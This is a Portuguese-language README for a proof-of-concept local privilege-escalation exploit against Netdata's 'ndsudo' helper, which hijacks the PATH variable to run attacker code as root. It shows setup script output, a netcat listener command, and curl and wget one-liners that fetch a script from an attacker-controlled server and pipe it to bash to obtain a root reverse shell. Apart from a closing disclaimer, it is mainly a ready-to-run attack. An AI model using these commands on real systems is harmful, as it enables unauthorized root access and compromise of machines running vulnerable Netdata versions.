
Script Bash para Escalação de Privilégios via "ndsudo" (Netdata Local Exploit)
Script Bash para Escalação de Privilégios via "ndsudo" (Exploit Local do Netdata)
>= v1.45.0, < v1.45.3
>= v1.44.0-60, < v1.45.0-169
A ferramenta "ndsudo" executa um conjunto restrito de comandos externos, mas os caminhos de pesquisa são fornecidos pela variável de ambiente "PATH".
Alterando a variável de ambiente "PATH" para um caminho ao qual temos acesso, podemos controlar onde o ndsudo procura pelos comandos e criar um que contenha código malicioso.
Este exploit baseia-se na suposição de que a máquina alvo e a máquina do atacante estão na mesma rede.
Podemos gerar e implantar automaticamente os arquivos necessários para o ataque executando o "setup_exploit_server.sh"
$ ./setup_exploit_server.sh YOUR_IP
--------- Exploit Infrastructure Setup by Ottanta ---------
[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444
Press Enter to stop the web server and clean up...
Este script criará todos os arquivos necessários para o ataque configurados com o seu endereço IP.
Após implantar nosso servidor web, iniciamos um listener em outro shell:
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...
Dependendo do nosso cliente HTTP, podemos baixar e executar nosso exploit.
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
Se tudo foi feito corretamente, agora devemos ter um shell root.

Esta prova de conceito é apenas para fins educacionais e de teste autorizado.
O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal.
Os autores não são responsáveis por qualquer uso indevido destas informações.